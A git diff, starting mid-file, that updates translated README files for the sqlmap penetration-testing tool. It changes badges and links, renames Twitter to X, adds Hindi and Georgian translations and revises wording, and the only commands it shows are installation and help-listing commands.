2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) **sqlmap** est un outil Open Source de test d'intrusion. Cet outil permet d'automatiser le processus de détection et d'exploitation des failles d'injection SQL afin de prendre le contrôle des serveurs de base de données. __sqlmap__ dispose d'un puissant moteur de détection utilisant les techniques les plus récentes et les plus dévastatrices de tests d'intrusion comme L'Injection SQL, qui permet d'accéder à la base de données, au système de fichiers sous-jacent et permet aussi l'exécution des commandes sur le système d'exploitation. @@ -19,7 +19,7 @@ De préférence, télécharger __sqlmap__ en le [clonant](https://github.com/sql git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap fonctionne sur n'importe quel système d'exploitation avec la version **2.6**, **2.7** et **3.x** de [Python](http://www.python.org/download/) +sqlmap fonctionne sur n'importe quel système d'exploitation avec la version **2.6**, **2.7** et **3.x** de [Python](https://www.python.org/download/) Utilisation ---- @@ -44,6 +44,6 @@ Liens * Suivi des issues: https://github.com/sqlmapproject/sqlmap/issues * Manuel de l'utilisateur: https://github.com/sqlmapproject/sqlmap/wiki * Foire aux questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Démonstrations: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Démonstrations: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Les captures d'écran: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-gr-GR.md b/doc/translations/README-gr-GR.md index ccdc4fc4401..ede6340d1ce 100644 --- a/doc/translations/README-gr-GR.md +++ b/doc/translations/README-gr-GR.md @@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων. @@ -20,7 +20,7 @@ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](http://www.python.org/download/) έκδοσης **2.6**, **2.7** και **3.x** σε όποια πλατφόρμα. +Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](https://www.python.org/download/) έκδοσης **2.6**, **2.7** και **3.x** σε όποια πλατφόρμα. Χρήση ---- @@ -45,6 +45,6 @@ * Προβλήματα: https://github.com/sqlmapproject/sqlmap/issues * Εγχειρίδιο Χρήστη: https://github.com/sqlmapproject/sqlmap/wiki * Συχνές Ερωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-hr-HR.md b/doc/translations/README-hr-HR.md index d8815b163de..dffab7062e6 100644 --- a/doc/translations/README-hr-HR.md +++ b/doc/translations/README-hr-HR.md @@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza. @@ -20,7 +20,7 @@ Po mogućnosti, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sql git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap radi bez posebnih zahtjeva korištenjem [Python](http://www.python.org/download/) verzije **2.6**, **2.7** i/ili **3.x** na bilo kojoj platformi. +sqlmap radi bez posebnih zahtjeva korištenjem [Python](https://www.python.org/download/) verzije **2.6**, **2.7** i/ili **3.x** na bilo kojoj platformi. Korištenje ---- @@ -45,6 +45,6 @@ Poveznice * Prijava problema: https://github.com/sqlmapproject/sqlmap/issues * Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki * Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-id-ID.md b/doc/translations/README-id-ID.md index dd52a847687..39ad3e58fb9 100644 --- a/doc/translations/README-id-ID.md +++ b/doc/translations/README-id-ID.md @@ -1,50 +1,53 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) -sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basis data. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur handal bagi _penetration tester_, beragam cara untuk mendeteksi basis data, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_. +sqlmap adalah perangkat lunak sumber terbuka yang digunakan untuk melakukan uji penetrasi, mengotomasi proses deteksi, eksploitasi kelemahan _SQL injection_ serta pengambil-alihan server basis data. + +sqlmap dilengkapi dengan pendeteksi canggih dan fitur-fitur handal yang berguna bagi _penetration tester_. Perangkat lunak ini menawarkan berbagai cara untuk mendeteksi basis data bahkan dapat mengakses sistem file dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_. Tangkapan Layar ---- ![Tangkapan Layar](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) -Anda dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki. +Anda juga dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki. Instalasi ---- Anda dapat mengunduh tarball versi terbaru [di sini](https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master). -Sebagai alternatif, Anda dapat mengunduh sqlmap dengan men-_clone_ repositori [Git](https://github.com/sqlmapproject/sqlmap): +Sebagai alternatif, Anda dapat mengunduh sqlmap dengan melakukan _clone_ pada repositori [Git](https://github.com/sqlmapproject/sqlmap): git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap berfungsi langsung pada [Python](http://www.python.org/download/) versi **2.6**, **2.7** dan **3.x** pada platform apapun. +sqlmap berfungsi langsung pada [Python](https://www.python.org/download/) versi **2.6**, **2.7** dan **3.x** pada platform apapun. Penggunaan ---- -Untuk mendapatkan daftar opsi dasar gunakan: +Untuk mendapatkan daftar opsi dasar gunakan perintah: python sqlmap.py -h -Untuk mendapatkan daftar opsi lanjut gunakan: +Untuk mendapatkan daftar opsi lanjutan gunakan perintah: python sqlmap.py -hh Anda dapat mendapatkan contoh penggunaan [di sini](https://asciinema.org/a/46601). -Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [Panduan Pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya. Anda disarankan untuk membaca [Panduan Pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage). Tautan ---- * Situs: https://sqlmap.org * Unduh: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) atau [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) -* RSS feed dari commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* RSS Feed Dari Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom * Pelacak Masalah: https://github.com/sqlmapproject/sqlmap/issues * Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki -* Pertanyaan yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Video Demo [#1](http://www.youtube.com/user/inquisb/videos) dan [#2](http://www.youtube.com/user/stamparm/videos) +* Pertanyaan Yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Video Demo [#1](https://www.youtube.com/user/inquisb/videos) dan [#2](https://www.youtube.com/user/stamparm/videos) * Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-in-HI.md b/doc/translations/README-in-HI.md new file mode 100644 index 00000000000..c2d323bcc81 --- /dev/null +++ b/doc/translations/README-in-HI.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap एक ओपन सोर्स प्रवेश परीक्षण उपकरण है जो SQL इन्जेक्शन दोषों की पहचान और उपयोग की प्रक्रिया को स्वचलित करता है और डेटाबेस सर्वरों को अधिकृत कर लेता है। इसके साथ एक शक्तिशाली पहचान इंजन, अंतिम प्रवेश परीक्षक के लिए कई निचले विशेषताएँ और डेटाबेस प्रिंट करने, डेटाबेस से डेटा निकालने, नीचे के फ़ाइल सिस्टम तक पहुँचने और आउट-ऑफ-बैंड कनेक्शन के माध्यम से ऑपरेटिंग सिस्टम पर कमांड चलाने के लिए कई बड़े रेंज के स्विच शामिल हैं। + +चित्रसंवाद +---- + +![स्क्रीनशॉट](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +आप [विकि पर](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) कुछ फीचर्स की दिखाते हुए छवियों का संग्रह देख सकते हैं। + +स्थापना +---- + +आप नवीनतम तारबाल को [यहां क्लिक करके](https://github.com/sqlmapproject/sqlmap/tarball/master) या नवीनतम ज़िपबॉल को [यहां क्लिक करके](https://github.com/sqlmapproject/sqlmap/zipball/master) डाउनलोड कर सकते हैं। + +प्राथमिकत: आप sqlmap को [गिट](https://github.com/sqlmapproject/sqlmap) रिपॉजिटरी क्लोन करके भी डाउनलोड कर सकते हैं: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap [Python](https://www.python.org/download/) संस्करण **2.6**, **2.7** और **3.x** पर किसी भी प्लेटफार्म पर तुरंत काम करता है। + +उपयोग +---- + +मौलिक विकल्पों और स्विच की सूची प्राप्त करने के लिए: + + python sqlmap.py -h + +सभी विकल्पों और स्विच की सूची प्राप्त करने के लिए: + + python sqlmap.py -hh + +आप [यहां](https://asciinema.org/a/46601) एक नमूना चलाने का पता लगा सकते हैं। sqlmap की क्षमताओं की एक अवलोकन प्राप्त करने, समर्थित फीचर्स की सूची और सभी विकल्पों और स्विच का वर्णन, साथ ही उदाहरणों के साथ, आपको [उपयोगकर्ता मैन्युअल](https://github.com/sqlmapproject/sqlmap/wiki/Usage) पर परामर्श दिया जाता है। + +लिंक +---- + +* मुखपृष्ठ: https://sqlmap.org +* डाउनलोड: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) या [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* संवाद आरएसएस फ़ीड: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* समस्या ट्रैकर: https://github.com/sqlmapproject/sqlmap/issues +* उपयोगकर्ता मैन्युअल: https://github.com/sqlmapproject/sqlmap/wiki +* अक्सर पूछे जाने वाले प्रश्न (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* ट्विटर: [@sqlmap](https://x.com/sqlmap) +* डेमो: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* स्क्रीनशॉट: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots +* diff --git a/doc/translations/README-it-IT.md b/doc/translations/README-it-IT.md index 6e72b169649..af10ee150cc 100644 --- a/doc/translations/README-it-IT.md +++ b/doc/translations/README-it-IT.md @@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap è uno strumento open source per il penetration testing. Il suo scopo è quello di rendere automatico il processo di scoperta ed exploit di vulnerabilità di tipo SQL injection al fine di compromettere database online. Dispone di un potente motore per la ricerca di vulnerabilità, molti strumenti di nicchia anche per il più esperto penetration tester ed un'ampia gamma di controlli che vanno dal fingerprinting di database allo scaricamento di dati, fino all'accesso al file system sottostante e l'esecuzione di comandi nel sistema operativo attraverso connessioni out-of-band. @@ -20,7 +20,7 @@ La cosa migliore sarebbe però scaricare sqlmap clonando la repository [Git](htt git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap è in grado di funzionare con le versioni **2.6**, **2.7** e **3.x** di [Python](http://www.python.org/download/) su ogni piattaforma. +sqlmap è in grado di funzionare con le versioni **2.6**, **2.7** e **3.x** di [Python](https://www.python.org/download/) su ogni piattaforma. Utilizzo ---- @@ -45,6 +45,6 @@ Link * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues * Manuale dell'utente: https://github.com/sqlmapproject/sqlmap/wiki * Domande più frequenti (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Dimostrazioni: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Dimostrazioni: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Screenshot: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-ja-JP.md b/doc/translations/README-ja-JP.md index 2d3fea9b915..3cbc9ce999c 100644 --- a/doc/translations/README-ja-JP.md +++ b/doc/translations/README-ja-JP.md @@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmapはオープンソースのペネトレーションテスティングツールです。SQLインジェクションの脆弱性の検出、活用、そしてデータベースサーバ奪取のプロセスを自動化します。 強力な検出エンジン、ペネトレーションテスターのための多くのニッチ機能、持続的なデータベースのフィンガープリンティングから、データベースのデータ取得やアウトオブバンド接続を介したオペレーティング・システム上でのコマンド実行、ファイルシステムへのアクセスなどの広範囲に及ぶスイッチを提供します。 @@ -21,21 +21,21 @@ wikiに載っているいくつかの機能のデモをスクリーンショッ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmapは、 [Python](http://www.python.org/download/) バージョン **2.6**, **2.7** または **3.x** がインストールされていれば、全てのプラットフォームですぐに使用できます。 +sqlmapは、 [Python](https://www.python.org/download/) バージョン **2.6**, **2.7** または **3.x** がインストールされていれば、全てのプラットフォームですぐに使用できます。 -使用法 +使用方法 ---- -基本的なオプションとスイッチの使用法をリストするには: +基本的なオプションとスイッチの使用方法をリストで取得するには: python sqlmap.py -h -全てのオプションとスイッチの使用法をリストするには: +全てのオプションとスイッチの使用方法をリストで取得するには: python sqlmap.py -hh 実行例を [こちら](https://asciinema.org/a/46601) で見ることができます。 -sqlmapの概要、機能の一覧、全てのオプションやスイッチの使用法を例とともに、 [ユーザーマニュアル](https://github.com/sqlmapproject/sqlmap/wiki/Usage) で確認することができます。 +sqlmapの概要、機能の一覧、全てのオプションやスイッチの使用方法を例とともに、 [ユーザーマニュアル](https://github.com/sqlmapproject/sqlmap/wiki/Usage) で確認することができます。 リンク ---- @@ -46,6 +46,6 @@ sqlmapの概要、機能の一覧、全てのオプションやスイッチの * 課題管理: https://github.com/sqlmapproject/sqlmap/issues * ユーザーマニュアル: https://github.com/sqlmapproject/sqlmap/wiki * よくある質問 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* デモ: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* デモ: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * スクリーンショット: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-ka-GE.md b/doc/translations/README-ka-GE.md new file mode 100644 index 00000000000..9eb193d1d17 --- /dev/null +++ b/doc/translations/README-ka-GE.md @@ -0,0 +1,49 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap არის შეღწევადობის ტესტირებისათვის განკუთვილი ინსტრუმენტი, რომლის კოდიც ღიად არის ხელმისაწვდომი. ინსტრუმენტი ახდენს SQL-ინექციის სისუსტეების აღმოჩენისა, გამოყენების და მონაცემთა ბაზათა სერვერების დაუფლების პროცესების ავტომატიზაციას. იგი აღჭურვილია მძლავრი აღმომჩენი მექანიძმით, შეღწევადობის პროფესიონალი ტესტერისათვის შესაფერისი ბევრი ფუნქციით და სკრიპტების ფართო სპექტრით, რომლებიც შეიძლება გამოყენებულ იქნეს მრავალი მიზნით, მათ შორის: მონაცემთა ბაზიდან მონაცემების შეგროვებისათვის, ძირითად საფაილო სისტემაზე წვდომისათვის და out-of-band კავშირების გზით ოპერაციულ სისტემაში ბრძანებათა შესრულებისათვის. + +ეკრანის ანაბეჭდები +---- + +![ეკრანის ანაბეჭდი](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +შეგიძლიათ ესტუმროთ [ეკრანის ანაბეჭდთა კოლექციას](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), სადაც დემონსტრირებულია ინსტრუმენტის ზოგიერთი ფუნქცია. + +ინსტალაცია +---- + +თქვენ შეგიძლიათ უახლესი tar-არქივის ჩამოტვირთვა [აქ](https://github.com/sqlmapproject/sqlmap/tarball/master) დაწკაპუნებით, ან უახლესი zip-არქივის ჩამოტვირთვა [აქ](https://github.com/sqlmapproject/sqlmap/zipball/master) დაწკაპუნებით. + +ასევე შეგიძლიათ (და სასურველია) sqlmap-ის ჩამოტვირთვა [Git](https://github.com/sqlmapproject/sqlmap)-საცავის (repository) კლონირებით: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap ნებისმიერ პლატფორმაზე მუშაობს [Python](https://www.python.org/download/)-ის **2.6**, **2.7** და **3.x** ვერსიებთან. + +გამოყენება +---- + +ძირითადი ვარიანტებისა და პარამეტრების ჩამონათვალის მისაღებად გამოიყენეთ ბრძანება: + + python sqlmap.py -h + +ვარიანტებისა და პარამეტრების სრული ჩამონათვალის მისაღებად გამოიყენეთ ბრძანება: + + python sqlmap.py -hh + +გამოყენების მარტივი მაგალითი შეგიძლიათ იხილოთ [აქ](https://asciinema.org/a/46601). sqlmap-ის შესაძლებლობათა მიმოხილვის, მხარდაჭერილი ფუნქციონალისა და ყველა ვარიანტის აღწერების მისაღებად გამოყენების მაგალითებთან ერთად, გირჩევთ, იხილოთ [მომხმარებლის სახელმძღვანელო](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +ბმულები +---- + +* საწყისი გვერდი: https://sqlmap.org +* ჩამოტვირთვა: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ან [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS არხი: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* პრობლემებისათვის თვალყურის დევნება: https://github.com/sqlmapproject/sqlmap/issues +* მომხმარებლის სახელმძღვანელო: https://github.com/sqlmapproject/sqlmap/wiki +* ხშირად დასმული კითხვები (ხდკ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* დემონსტრაციები: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* ეკრანის ანაბეჭდები: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-ko-KR.md b/doc/translations/README-ko-KR.md index df959c3ca4f..dd508732dde 100644 --- a/doc/translations/README-ko-KR.md +++ b/doc/translations/README-ko-KR.md @@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) 